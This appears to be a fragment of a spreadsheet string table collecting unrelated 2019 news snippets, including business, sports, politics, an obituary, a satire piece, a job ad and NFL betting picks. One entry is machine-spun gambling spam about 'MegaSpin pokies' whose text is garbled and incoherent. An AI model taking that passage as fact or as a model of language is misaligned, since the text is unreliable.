    <t>Received this offer via email a short while ago: We've extended out most popular offer ever to help you fill your fridge with healthy meals for the week ahead! We cook, you eat - easy! Use the code 9FOR59 at the checkout to get 9 meals for $59. Looks like a generic code which should be open for all to use, similar to this deal which recently expired. Expires October 9, 11.59PM. Min spend $89.55.</t>
  </si>
  <si>
    <t>US retail giant Walmart Inc. on Friday said in a statement that it is piloting blockchain technology for end-to-end traceability of shrimp sourced in Andhra Pradesh and shipped to select Sam’s Club (American chain of membership-only retail warehouse clubs owned and operated by Walmart Inc.) locations in the US. The pilot project is the first known use of blockchain to track shrimp exports from the Indian farmer to an overseas retailer. This will help seafood farmers in the region to strengthen the shrimp supply chain and reinforce customer trust in the product, helping promote India as a preferred source of seafood, while also enhancing food traceability and transparency for consumers in the US. Shrimp is India’s largest agricultural export, with the US as its largest market, taking a 46% share of India’s shrimp exports by value in 2018. In Andhra Pradesh, the heartland of shrimp farming in India, the state government is encouraging farmers to improve quality standards and comply with stringent US monitoring programs to win the trust of US retailers and consumers and strengthen shrimp cultivation as a sustainable long-term growth industry. Using blockchain technology in the shrimp supply chain supports this effort. Blockchain is a way to digitize data and share information across a complex supply chain network in a secure and trusted manner. The introduction of blockchain in the shrimp supply chain could help improve the quality of information on the product for compliance purposes and for sharing with consumers, providing added traceability beginning at the farm and extending throughout the transportation process. It could also monitor food safety procedures throughout the growth and processing of the shrimp. Blockchain could thus add a level of visibility to bring extra peace of mind and value to overseas customers and reinforce India’s status as a trusted source of seafood. “The possibility of transforming the seafood community with blockchain technology exists and organizations need to do the work to test its potential to optimize supply chain processes. As one of the most traded commodities in the world, seafood has a complex and wide-reaching supply chain, which makes testing and further developing technology-assisted traceability programs an important step. It is encouraging to see a retail leader like Walmart participate in seafood blockchain testing,” said John Connelly, president of the National Fisheries Institute in the US. For this pilot, the company worked closely with Andhra Pradesh-based seafood processor Sandhya Aqua and US-based supplier Stanley Pearlman Enterprises, Inc. to add the shrimp supply chain to the blockchain-enabled IBM Food Trust and create shared value for the entire shrimp farm-to-table continuum. Walmart Inc. has collaborated with IBM on the use of blockchain technology to enhance global food traceability since 2017. The two partners have already launched several initiatives to strengthen food safety in the fresh produce supply chain. “This end-to-end blockchain pilot is the first of its kind in India and has the potential to create long-term economic opportunity for the shrimp farming community in Andhra Pradesh, directly benefiting the farmers through new skills training and development,” said Chowdary Kunam, managing director of Sandhya Aqua. This new blockchain pilot supplements an extensive Sam’s Club food safety program that requires suppliers of seafood products, including shrimp, to complete prevention-based certifications like Best Aquaculture Practice (BAP), an internationally recognized standard. To support smallholder farmers in Andhra Pradesh, Walmart Inc. provided funding for the BAP certification training, helping farmers access market opportunities they may not previously have had. “We’re committed to doing business in India in a way that helps drive economic opportunity in local communities across the country,” said Paul Dyck, vice president of corporate affairs for Walmart Inc. “Through this pilot we are working with our partners and leveraging our global strengths to provide access to blockchain’s innovative technology which will benefit local farmers and producers, help to transform the food system and also provide a quality product that delights our customers and members.”</t>
  </si>
  <si>
    <t>Mitchell Layton-USA TODAY Sports There is plenty to talk about regarding all things black-and-gold! Several people have asked if we could bring back the Friday Night Open Thread. I had moved the event to Saturday morning, but after minimal success, I decided to bring it back to Friday night — with a slight twist. I liked the Saturday Six-Pack theme, so I decided to just take the six questions and move them to Friday night. Say hello to Friday Night Six-Pack of Steelers Questions and open thread! The rules haven’t changed… Quick rundown of the ground rules. I’ll ask at least four questions strictly related to the Steelers. The rest of the questions could be about anything. Be respectful. Have fun talking about the Black-and-gold. That’s it! With that out of the way, it’s time to get this party started. Hey, don’t act like you’ve never done a little Friday night drinking. Here goes: 1. No one predicted the Steelers going to the Wildcat and jet-sweep offense in Week 4 vs. the Bengals. If they are going to game plan, or gimmick, their way for every opponent, what would you have the offense do to help them put up points against a sinking Ravens’ defense? 2. We discussed this on the Steelers Preview last night, you can hear it below…who is your offensive and defensive ‘X-Factor’ on Sunday? An X-Factor is someone who is dynamic enough to alter the outcome of the game. 3. Also on the Preview I asked a simple question, but created some great discussion. When you think of the Baltimore Ravens, what game/situation/player do you think of? 4. Many fans aren’t believers in the Steelers yet, and rightfully so. But what would it take for you to think this team has a shot to compete? Would it just be a win Sunday vs. Baltimore, or more than that? 5. The line on the BAL vs. PIT game, as of writing this, is as follows: PIT + 3.5 OVER/UNDER: 44.5 If you were betting, where would you put your money? 6. Caption the photo below: Charles LeClaire-USA TODAY Sports No matter what, always remember… HERE WE GO STEELERS! PODCASTS</t>
  </si>
  <si>
    <t>About three hours into Game 3 of the ALCS, Adam Ottavino walked off the mound to a cascade of boos from a frustrated crowd that had seen the Yankees offense get opportunities in five of seven innings against Astros ace Gerrit Cole only to be unable to score runs. Source: Sports Business News</t>
  </si>
  <si>
    <t>The move by the son of former US Vice-President Joe Biden follows attacks by President Donald Trump. The post Hunter Biden to step down from China board amid Trump attacks appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Buck Showalter could be in line to become the Philadelphia Phillies’ next manager after Gabe Kapler was fired Thursday. Source: Sports Business News</t>
  </si>
  <si>
    <t>A MAN accused of defrauding a North Queensland council will now be able to freely travel interstate after a court heard he had several job prospects across the country.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/10/02/robinhood-e-trade-schwab-ameritrade/ Lookout, Robinhood. E*Trade, Schwab, Ameritrade go zero-fee The biggest players in online stock trading all just copied Robinhood by removing their fees for stock and ETF trading. Charles Schwab announced yesterday it would drop its $4.95 fee, leading to plummeting share prices for it as well as competitors. By the end of yesterday, Ameritrade announced it too would axe its $6.95 fees, and then E*Trade followed suit this morning killing off its own $6.95 fee. However, none of their share price recovered. From yesterday before Schwab’s announcement through now, Schwab fell 12%, from $41.84 to $36.54; E*Trade fell 19%, from $43.69 to $35.20; and Ameritrade fell 28%, from $46.70 to $33.54. Clearly investors aren’t thrilled that these financial giants are bowing to pressure from a measly startup. Yet the move could definitely hurt growth for the $7.6 billion-valued fintech upstart Robinhood. It has relied on the free stock trades to pull in users that it then monetizes with its Robinhood Gold subscription to premium services, including the ability to trade on margin by temporarily borrowing money from the company. Schwab drops its fees “The changes taking place across the brokerage industry reflect a focus on the customer that‘s been inherent to Robinhood since the beginning,” said a spokesperson for the startup. “We remain focused on offering intuitively designed products that reduce barriers to our financial system, including account minimums and commission fees.” Robinhood was hoping a high 3% interest rate checking account feature announced in December might help differentiate it from online stock brokerages. But after it prematurely launched the checking product without proper insurance, massive backlash ensued and the company announced it would shelve and rethink the idea. But that hiccup didn’t stop it from raising another $323 million this July to bring its total raised to $862 million. Its young user base and cryptocurrency exchange could give it potential that aged trading platforms lack. Source: https://techcrunch.com/2019/10/02/robinhood-e-trade-schwab-ameritrade/ The post Lookout, Robinhood. E*Trade, Schwab, Ameritrade go zero-fee appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Listening to the nonsense of @VictoriaPrentis on @lbc proposing brexit compromise &amp; adopting 'wavy red lines'. Basically admitting the promised brexit is not deliverable, suggesting border checks 'in other locations'. — Jay #StopBrexit #FBPE (@jaypwright) October 5, 2019 from Twitter https://twitter.com/jaypwright</t>
  </si>
  <si>
    <t>Annastacia Palaszczuk has praised Brisbane-made hit children's show Bluey after it was nominated for an Emmy.</t>
  </si>
  <si>
    <t>A good number of suitable MegaSpin pokies:The following authorities at the rear of MegaSpin pokies is definitely definitely best best functions coder, Microgaming, which means any cases or even snap shots are exciting plus the gameplay is certainly smooth. All people recognize usual favourite MegaSpin slot machines being offered at this on the net recognised casinos. MegaSpin fly fishing reels:Which usually slot machine game equipment mmorpgs paid for are actually straightforward on the web training video and then / or possibly basic pai gow poker-online displaying representations, take a flight reef fishing reels, along with specialized attributes and then take up possibly 5 virginia fishing reel or maybe even 3 keel MegaSpin pokies. One should be aware for which you may not accomplish while doing so 5 keel besides 3 va virginia reel training video poker units by way of the sole game. What exactly happen to be MegaSpin slots?Basically we commonly notice all natural jackpot pokies when we finally pick up your current prefix hugely , but so that it denotes alot extra re-writes along with on account of the supplement with extra gambling establishment wars for the chief game.MegaSpin areas find several training equipment upon generally the only one telly computer screen, in which essentially all of the benefit from on your own of a single another to offer you alot way more prospects to help you win. Based on the brand name, certainly,there may routinely a group amount of additional online casino battles, differing by 6-8 to make sure you 90 years in the appropriate single action that will be cherished all at one time – profits many of the replacement for pick up the number of too much pai gow poker on-line Play Online Slots Guide Recommendations &amp; Guide | Medical Skills and Simulation Center you ought to take part in for once. Options to be successful on MegaSpin pokies:Each video slot machine machines within the MegaSpin variation will keep planning from home of one another, to help you normally attain relevant to a new lone device, succeed on the subject of almost all home fitness equipment, achieve success about them of some even so move about people, and also most severe place help reduce with regards to each of the any kind of exercise equipment round play.Depending inside the type, you will will then end up being paid corresponding inside the compensation dining event bench – you must look into this kind of when you start spinning. MegaSpin Two-fold Remarkable would depend upon big using the web pai gow poker-online also known as Two fold Magic. Your result is perhaps identical format nonetheless entails added mmorpgs with regard to the only title.MegaSpin 2 product Sorcery features up to seven effective 3 reel spots for around game. You will like to try out quite a few, half-dozen, or simply virtually all nine in the pai gow texas holdem established from once. Have only a single payline using a most significant 18 gold coins each and every disregard quickly xbox game post titles within play. There’s a chance you’re prosperous by way of too much 14,000 money although you may make an effort to secure with regards to a large amount of 90 many years while using the games.</t>
  </si>
  <si>
    <t>Ms. Warren was squeezed, at times, from the left as well: While Mr. Sanders never broke their informal nonaggression pact, he agreed with several of the moderates that it was “appropriate” to enumerate the financial trade-offs involved in single-payer health care, including taxes on Americans that would be “substantially less than what they were paying for premiums and out-of-pocket expenses.” And while Mr. Sanders, who had a heart attack this month, was forced to address new concerns about his health, his campaign aides confirmed during the debate that he had secured an endorsement from Representative Alexandria Ocasio-Cortez of New York that could inject new energy into his candidacy. But there were also the germs of a broader discussion of the role of the United States in the Middle East: In an intense exchange between the two military veterans onstage, Representative Tulsi Gabbard of Hawaii said that it was not only Mr. Trump who had “the blood of the Kurds on his hands,” but also politicians in both parties and news media organizations that had cheered for “regime change war.” Her remarks drew forceful pushback from Mr. Buttigieg, who said Ms. Gabbard was “dead wrong,” arguing that “the slaughter going on in Syria is not a consequence of American presence — it is a consequence of a withdrawal and a betrayal by this president of American allies and American values.” While Mr. Biden and Ms. Warren did not clash directly over foreign policy, they diverged in a stark fashion over the situation in Syria. Mr. Biden said he would want to keep American troops there and convey to the Turkish government that it would pay a “heavy price” for its invasion. Ms. Warren said she opposed Mr. Trump’s handling of the situation but believed the United States should “get out of the Middle East.” (Aides to Ms. Warren said she was referring to the withdrawal of troops from combat.) Throughout the debate, which was sponsored by CNN and The New York Times, Mr. Biden played a far less central role than he did in the past, stepping to the foreground for exchanges over foreign policy but otherwise taking a more passive approach. His most important moment of the night may have come early on, when he was pressed by a moderator to explain why his son had not crossed any ethical lines by doing business in Ukraine while his father was overseeing diplomacy there for the Obama administration. Mr. Biden said several times that he and his son had done “nothing wrong,” and alluded repeatedly to an interview Hunter Biden gave to ABC News, in which he said it had been an error in judgment to sit on the board of a Ukrainian gas company while the elder Mr. Biden was vice president. Mr. Trump has accused the Bidens of corruption, often in false or exaggerated terms, and his efforts to enlist the government of Ukraine in tarring Mr. Biden instigated an impeachment inquiry. Source link</t>
  </si>
  <si>
    <t>On Wednesday, Newcastle United midfielder Mo Sangare started in the 1-0 win over Chad. That was the 21 year old’s fifth senior international appearance for Liberia and he helped them...On Wednesday, Newcastle United midfielder Mo Sangare started in the 1-0 win over Chad. That was the 21 year old’s fifth senior international appearance for Liberia and he helped them... You can click here to read the full article. The post Heartbreak for Newcastle midfielder now out of ACON and ex-NUFC defender scores on Scotland debut appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>Charles Jencks, whose writing on architecture helped define the field after Modernism, and who put his ideas into practice both in memorable landscape architecture and in overseeing the creation of Maggie’s Centers, buildings specifically designed for cancer patients, died on Sunday at his home in London. He was 80. His sister, Penelope Jencks, said the cause was cancer. Mr. Jencks was an architectural historian who, with a landmark book, put himself at the forefront of the debate over what architecture should do. “Charles boldly announced the death of Modernism in his 1977 book ‘The Language of Post-Modern Architecture,’” Joseph Giovannini, who writes frequently about architecture, said by email. “He also brashly offered its replacement, Post-Modernism, stirring angry style wars that raged in architecture for more than a decade.” Mr. Jencks had little use for Modernism, the style emphasizing geometric forms and rational use of space and eschewing ornamentation, which had dominated the first three-quarters of the 20th century. Instead he advocated “radical eclecticism” — he believed architecture should reflect the environment, should embrace symbolism and metaphor, and should celebrate distinct styles and merge different influences. “If he was sometimes facile,” Mr. Giovannini, who has written frequently for The New York Times, said, “he was always witty and erudite, and with his teasing polemics, he succeeded as an agent provocateur who helped open the field to other paradigms.” Mr. Jencks wrote numerous books, among them “Le Corbusier and the Continual Revolution in Architecture” (2000), “Iconic Building” (2005) and “The Story of Post-Modernism” (2011), but he was known for more than just words. As a landscape architect, he created intriguing, whimsical gardens, walkways and parks in Scotland, England, Italy, China, South Korea and elsewhere, many of them with science-based themes. His 40-acre Garden of Cosmic Speculation in Dumfries, Scotland, “uses nature to celebrate nature, both intellectually and through the senses, including the sense of humor,” Mr. Jencks’s website says. DNA, quarks, black holes and more inspired its features. His Crawick Multiverse opened nearby in 2015 and turned an old coal-mining site into a cosmos-related piece of land art that includes twin mounds representing the Milky Way and Andromeda galaxies. Another Jencks creation is Northumberlandia, a quarter-mile-long reclining woman formed out of the landscape near Northumberland, in northeast England. “He put his causes — irony, history, complexity, symbolism — into practice in his own architecture,” Mr. Giovannini said. “His landscape designs were brilliant.” Mr. Jencks also devoted considerable effort to Maggie’s Centers, an idea that originated with his second wife, Maggie Keswick Jencks, during the seven years she had breast cancer and was furthered by Mr. Jencks after she died in 1995. She envisioned buildings where cancer patients could go for the kind of welcoming support and life-affirming relaxation not generally offered in hospitals. He helped recruit leading architects to design the buildings and grounds, with Zaha Hadid, Frank Gehry and Kisho Kurokawa among those participating. The first Maggie’s Center opened in 1996 in Edinburgh. There are now more than 20, mostly in Britain but also in Tokyo and Hong Kong. “Architects, like any group, are competitive and collegial, but with us it seems that each successive center has set the bar a little higher,” Mr. Jencks wrote in “The Architecture of Hope: Maggie’s Cancer Caring Centres,” a 2015 book documenting the continuing project. “Their performance — and I speak as a (self-interested) critic — has been extraordinarily high.” Charles Alexander Jencks was born on June 21, 1939, in Baltimore, though he would spend much of his adult life in England. His father, Gardner Platt Jencks, was a pianist and composer, and his mother, Ruth (Pearl) Jencks, was a biologist and artist. Mr. Jencks grew up in Westport, Conn., and Wellfleet, Mass., and studied English literature at Harvard University, receiving a bachelor’s degree there in 1961. In 1965 he earned a master’s degree at Harvard’s Graduate School of Design, and in 1970 he received a Ph.D. in architectural history at University College London. His doctoral thesis became the book “Modern Movements in Architecture” (1973), which announced him as a significant voice in the field. Four years later came “The Language of Post-Modern Architecture,” which Ada Louise Huxtable, the architecture critic of The Times, called “the book of the year.” The volume, she wrote in December 1977, “takes architecture apart and puts it together again with critical wit and a nice bit of scholarly venom.” In that book, Mr. Jencks examined the good and the bad in architecture and faulted Modernist designs for saying little. “We must go back to a point where architects took responsibility for rhetoric, for how their buildings communicated,” he wrote. “An architect’s primary and final role,” he added, “is to express the meanings a culture finds significant, as well as elucidate certain ideas and feelings that haven’t previously reached expression. The jobs that too often take up his energy might be better done by engineers and sociologists, but no other profession is specifically responsible for articulating meaning and seeing that the environment is sensual, humorous, surprising and coded as a readable text.” Mr. Jencks’s first marriage, to Pamela Balding in 1961, ended in divorce in 1973. He married Ms. Keswick in 1978. She was a landscape designer who had written a book about Chinese gardens, and the country house she inherited from her parents became the site of the Garden of Cosmic Speculation. “When you design a garden,” Mr. Jencks wrote in a 2000 picture book about that garden, “it raises basic questions. What is nature, how do we fit into it, and how should we shape it where we can, both physically and visually?” “Serious garden art,” he added, “is a heightening of both aspects of nature, its beauty and terror. Japanese Zen gardens, Persian paradise gardens, the English and French Renaissance gardens were, in some respects, analogies of the cosmos as then understood.” Mr. Jencks married Louisa Lane Fox in 2006. She survives him, as do his sister; two sons from his first marriage, Ivor and Justin; a son and daughter from his second marriage, John and Lily Jencks; a stepdaughter, Martha Lane Fox; a stepson, Henry Lane Fox; eight grandchildren; and five step-grandchildren. In 2011 Mr. Jencks was interviewed by The Guardian about another gigantic land form, “Cells of Life,” that he was working on at Jupiter Artland, a sculpture park near Edinburgh. What, he was asked, drove him to make works that sought to connect the land to the cosmos? “It’s something people have done even before they built Stonehenge,” he said, “so why not now?” Source link</t>
  </si>
  <si>
    <t>Rachael Houlihan</t>
  </si>
  <si>
    <t>Climate change activists locked themselves together with pipes in the middle of a busy CBD road and glued their hands on the King Street bridge as part of their latest demonstrations of a week-long protest,</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/191001/p10#a191001p10 Collaborative presentation software startup Pitch launches in private beta and raises $30M Series B led by Thrive Capital (Ingrid Lunden/TechCrunch) Ingrid Lunden / TechCrunch: Collaborative presentation software startup Pitch launches in private beta and raises $30M Series B led by Thrive Capital — The software industry is no spring chicken, and that fact that brought us to an interesting moment in technology: some of the biggest legacy apps — ubiquitous as they may be … Source: http://www.techmeme.com/191001/p10#a191001p10 The post Collaborative presentation software startup Pitch launches in private beta and raises $30M Series B led by Thrive Capital (Ingrid Lunden/TechCrunch) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>3M Releases Command Self-Adhesive Meat Hooks For Serial Killers Trying To Reduce Clutter MAPLEWOOD, MN—Touting the product as a revolution in space-saving, 3M released new Command self-adhesive Meat Hooks Friday for the organization-minded serial killers looking to reduce clutter in their lives and workspaces. “Say goodbye to those unsightly piles of corpses and tangles of severed limbs taking up all the space in your basement—because our new Command Meat Hooks provide an efficient storage solution expressly designed for serial killers, torture-murderers, and just about anyone else who feels overwhelmed by the mounting flesh of their victims,” a press release from 3M read in part, adding that the easy-to-hang meat hooks allow the conscientious hunter of human game to store, sort, and display up to 80% more of their unwitting prey in the same square footage of lair. “Command Meat Hooks are available in a variety of styles and tastefully understated colorways, all of which come equipped with labeling tabs, so organizing your unspeakable trophies has never been easier. And for those with more specialized and discerning tastes, our hooks are available in sizes fit for smaller and more tender hands, feet, and viscera, as well as Super Duty Bulk Hooks for those corn-fed heartland lunkers who tip the scales at up to 450 pounds. No matter what your tastes, Command Meat Hooks are up to snuff!” The 3M corporation also noted that the hooks’ easy-removal adhesive tabs meant that the reapers who winnow the great crop of mankind need not worry about accidentally chipping their walls or ceilings while hiding evidence as the police close in. Original Source Follow us on Twitter Amazon’s 30-Day FREE Trials The post 3M Releases Command Self-Adhesive Meat Hooks For Serial Killers Trying To Reduce Clutter appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Delivering her strongest comments to date on Hong Kong, Senator Payne said "the invoking of emergency laws was very concerning to Australia".</t>
  </si>
  <si>
    <t>HOT on the heels of its listing as one of Australia’s finest restaurants, Harrison’s by Spencer Patrick is bringing two world-class chefs to Port Douglas for a special evening next week.</t>
  </si>
  <si>
    <t>With so many options, you can do as much or as little as you like. The Islands of Tahiti, officially known as French Polynesia, possesses one of the most … The post Like to be naked On Tahiti??? appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Able to help in daily Account Receiveble transactions such as; – Bank Reconciliation, – Collection of past due invoices, – Accounts Payable, – Other office and administrative duties can be handled. Qualifications: – Must be fluent in french and an good MS Excel skill. – Must be able to prioritize and multi-tasking, To apply for .. Read more</t>
  </si>
  <si>
    <t>Worldwide Boat yacht charter broker Chris Green is providing tips on choosing the perfect charter yacht. There are many frequently asked questions on this topic and Worldwide Boat is here to provide as many details as possible to ensure you have all of the information you need. While visiting our page here https://www.worldwideboat.com/charter-advice/crewed-charter-cost will greatly […] The post How to choose a charter yacht appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Vitor Matos Hired by Liverpool from Porto Vitor Matos Hired by Liverpool from Porto This post Vitor Matos Hired by Liverpool from Porto appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>submitted by /u/khasaia [link] [comments]</t>
  </si>
  <si>
    <t>Ryan Kessler</t>
  </si>
  <si>
    <t>Don Morgan says the Saskatchewan government has plans to implement a drug treatment court in Saskatoon, but no timeline is in place.</t>
  </si>
  <si>
    <t>Mr Singh is on trial accused of murdering his wife Parwinder Kaur by lighting her on fire at their home in Sydney's west in 2013. He has pleaded not guilty.</t>
  </si>
  <si>
    <t>BRITISH motorists could soon ditch car ownership in favour of Uber-style hiring services in radical new proposals to curb climate change. UK drivers would use a network of managed vehicles owned by private companies in a network of rental cars instead of having a vehicle on their drive. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>We are back on the cobbles, hurrah! It may have been on hiatus for a week, and I honestly struggled...</t>
  </si>
  <si>
    <t>Flower Mound, Texas News Colin Powell slams Trump and Republicans, says the party has left U.S. ‘foreign policy in shambles’ Man, 18, and boys, 16 and 12, are killed and six-year-old is missing after car plunges into canal Donald Trump calls for Nancy Pelosi and Adam Schiff to be IMPEACHED in furious Twitter rant Steelers’ medical cart breaks during game, forcing teammates to carry their injured QB off the field Singapore Festival Commissions Three Short Films Time to stop being afraid of the dark… for the sake of our health, mood and waistbands Turkey to Northern Syria and to take custody of all ISIS fighters captured over the past two years Colin Powell slams Trump and Republicans, says the party has left U.S. ‘foreign policy in shambles’ Posted: 06 Oct 2019 11:56 PM PDT Powell, a retired four-star general and former Secretary of State and Defense, was speaking with CNN’s Fareed Sakaria when he laid into Trump and Republicans who back him on the Hill. via https://youtu.be/mFQfuwZZ8h8 Man, 18, and boys, 16 and 12, are killed and six-year-old is missing after car plunges into canal Posted: 06 Oct 2019 11:56 PM PDT The car with the five young occupants plunged into the Chesapeake and Delaware Canal, west of St Georges, around 9:40 am Sunday. Three bodies were recovered, while a six-year-old is missing. via https://youtu.be/mFQfuwZZ8h8 Donald Trump calls for Nancy Pelosi and Adam Schiff to be IMPEACHED in furious Twitter rant Posted: 06 Oct 2019 11:26 PM PDT President Donald Trump accused Nancy Pelosi of treason over ‘Shifty” Adam Schiff’s ‘lies and massive frauds’ in a tweeted reference to his parody version of the president’s Ukraine phone call via https://youtu.be/mFQfuwZZ8h8 Steelers’ medical cart breaks during game, forcing teammates to carry their injured QB off the field Posted: 06 Oct 2019 11:26 PM PDT The Pittsburgh Steelers are receiving criticism for the way medical officials handled an injury to quarterback Mason Rudolph during the team’s overtime loss to the Ravens Sunday afternoon. via https://youtu.be/mFQfuwZZ8h8 Singapore Festival Commissions Three Short Films Posted: 06 Oct 2019 11:07 PM PDT South East Asian filmmakers, Mouly Surya, Yeo Siew Hua and Anucha Boonyawatana have received commissions to direct short movies for the Singapore International Film Festival. Although other film festivals in Asia including Tokyo and Jeonju have previously ventured into production, it is a first for the SGIFF. It gave the trio the topic 'celebration' to […] via https://youtu.be/mFQfuwZZ8h8 Time to stop being afraid of the dark… for the sake of our health, mood and waistbands Posted: 06 Oct 2019 09:26 PM PDT Night shifts have been linked to strokes, heart attacks and some forms of cancer, writes authors Sigri Sandberg and Sian Mackie in their new book ‘An Ode to Darkness’ via https://youtu.be/mFQfuwZZ8h8 Turkey to Northern Syria and to take custody of all ISIS fighters captured over the past two years Posted: 06 Oct 2019 09:16 PM PDT The Turkish government plans to invade Northern Syria and take into custody all ISIS fighters captured over the past two years. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>In Wednesday's Real Footy podcast special, Sam McClure and Peter Ryan wrap day three of trade period, giving you all the details of the deal.</t>
  </si>
  <si>
    <t>NFL Week 6 odds, picks: Patriots beat up on Giants, Chiefs rebound against Texans, plus other best bets After a humbling start to the season with my five weekly best bets, I’m finally on the mend. Since Week 2, I’ve posted a 7-7-1 record, which normally wouldn’t be anything to celebrate, but after going 1-9 in Weeks 1 and 2, 7-7-1 sounds just fine. At this point, I’ve appeared to stave off absolute disaster and now it’s all about crawling my way back to respectability. On that note, I’m happy to report that I’m coming off my first three-win week of the season — and it likely would’ve been four wins if not for the Bears committing an awful running into the punter penalty, which gave the Raiders another chance to go down the field to score a late touchdown that didn’t just beat the Bears, but also wrecked the under. But I’ll take what I can get. With that 3-2 week, I’ve almost got momentum on my side — or as Josh Lyman would call it, “THE BIG MO!” That’ll make a lot more sense if you skip to the 39-second mark of the video below, or if you’ve already seen “The West Wing.” If you don’t care about THE BIG MO, just keep on scrolling until you see the first of my five picks for Week 6. Last week: 3-2 This year: 8-16-1 All odds via SportsLine 1. Patriots -17 vs. Giants Seventeen is a big number, but consider the Giants’ circumstances. On a short week, the 2-3 Giants have to travel to Foxborough, where their rookie quarterback will be tasked with going up against the greatest coach of all time and the league’s best defense in his fourth career start, all without Saquon Barkley and Wayne Gallman, both of whom have been ruled out. As my colleague, Will Brinson, noted on Wednesday, rookie quarterbacks not named Deshaun Watson and Andrew Luck almost always struggle against Bill Belichick, which makes sense because he’s Bill Belichick and they’re rookie quarterbacks. The Patriots’ average margin of victory this season? 24.2 points. They’re better than the Giants in every single area — except maybe kicker. Daniel Jones has looked promising since he took over for Eli Manning, but he’s also looked exactly what you’d expect of a rookie quarterback. He’s mistake prone. A week ago, we saw Mike Zimmer’s defense stymie Jones. I think it’ll go even worse for Daniel in Week 6 given the opposition (the best team in football led by the greatest coach of all time) and the circumstances (a short week on the road). Patriots by a million. 2. Giants at Patriots Under 41 Four of the Patriots’ five games this season have gone under and the only time the over hit was when the Patriots gave up a pick-six thrown by backup quarterback Jarrett Stidham and a special teams touchdown against the Jets. This Patriots defense is just so dang good — first in DVOA, first in points allowed per game, and first in yards allowed per game — and they’re going up against a rookie quarterback, who, as mentioned in the section above, should struggle mightily on the road against Belichick on a short week. The Patriots shouldn’t have any issues moving the ball against a Giants defense that is 23rd by DVOA, but assuming the Patriots’ defense *ahem* does its job, the Patriots’ offense should be content running out the clock once it gains a sizable advantage. 3. Bengals +11.5 at Ravens The Bengals are bad, but the Ravens might not be good. We thought they were great when they walloped the Dolphins in Week 1, but then we quickly realized everyone wallops the Dolphins. Since then, they’ve squeaked out a victory over the Cardinals, lost to the Chiefs and Browns in two games that weren’t particularly close, and edged in overtime a Steelers team that was down to its third-string quarterback. I expect the Ravens to beat the Bengals, because unlike the Bengals, the Ravens aren’t bad. But 11.5 is way too big of a number. The Ravens are 0-4 against the spread since Week 1. While the Bengals are bad, they’re good enough to keep their margin of defeat below 11 points. They’re 2-3 against the spread and both of those wins came in road games where they were underdogs. The Ravens’ defense isn’t any good — 24th in DVOA — and they just lost Tony Jefferson to a season-ending injury, so don’t be surprised if Andy Dalton is able to hang around. At the very least, he should be able to do damage in garbage time. We saw it a week ago when the Bengals exploded for 14 points in the fourth quarter against the Cardinals to turn what should’ve been an uninteresting final quarter into a nail-biter. Ravens win, but not by more than 10 points. Which picks can you make with confidence in Week 6? And which Super Bowl contender gets stunned? Visit SportsLine now to see which NFL teams are winning more than 50 percent of simulations, all from the model that is up almost $7,000 on its top-rated NFL picks. 4. Texans at Chiefs -4.5 Even though the Chiefs’ offense is banged up, don’t expect them to submit a second straight subpar performance after they were held to 13 points in a loss to the Colts. Since Patrick Mahomes became the Chiefs’ full-time starter at the beginning of last season, the Chiefs have scored fewer than 28 points only four times — they scored 27 twice and 26 once. There’s also a chance Tyreek Hill will return, which would help the Chiefs beat the man coverage that’s been holding them in check recently. Most importantly, Mahomes (ankle) was a full participant at practice on Wednesday. In general, this feels like an overreaction to both the Texans’ huge win over the Falcons that saw them drop 53 points on one of the worst defenses in football and the Chiefs’ loss to the Colts. The Chiefs are still 4-1. They were never going to go undefeated. The Texans have had their issues this season, which is why they’re only 3-2. I was prepared to pick the over (55), but then I realized that despite having Deshaun Watson, the Texans’ games have already gone under three times this year. They went under 10 times last season. So, instead, I’ll take the better of the two teams to win by a touchdown at home. Even after last week, the Chiefs are third in DVOA and the Texans are 10th. Expect a bounceback game for Mahomes and for the Texans to come back down to earth. 5. Lions +4 at Packers The last time we saw the Lions, they were beating the Chiefs until Mahomes mounted a late comeback. Nobody — certainly not me — expected the Lions to push the Chiefs to the brink, but the Lions did. Likewise, nobody expected the Lions to compete for the NFC North, but the Lions are 2-1-1. Matthew Stafford is playing like a top-five quarterback right now, which means he’s out playing Aaron Rodgers, and the Packers’ defense has been trending down after a hot start to the season, giving up 58 points over their past two games and dropping to ninth in DVOA. With Davante Adams banged up and possibly absent once again, the Packers probably don’t have enough offensive firepower to blow out the Lions. The Packers are only 13th in scoring. Every game the Lions have played so far this season has been decided by four points or fewer. I expect that trend to continue on Monday night. I think the Lions are good enough to only lose by a field goal. And here’s where it’s worth noting that the Packers haven’t beaten the Lions since Week 17 of the 2016 season. Not only do the Lions have a four-game winning streak against the Packers, but they’ve won those four games by an average margin of 19 points. 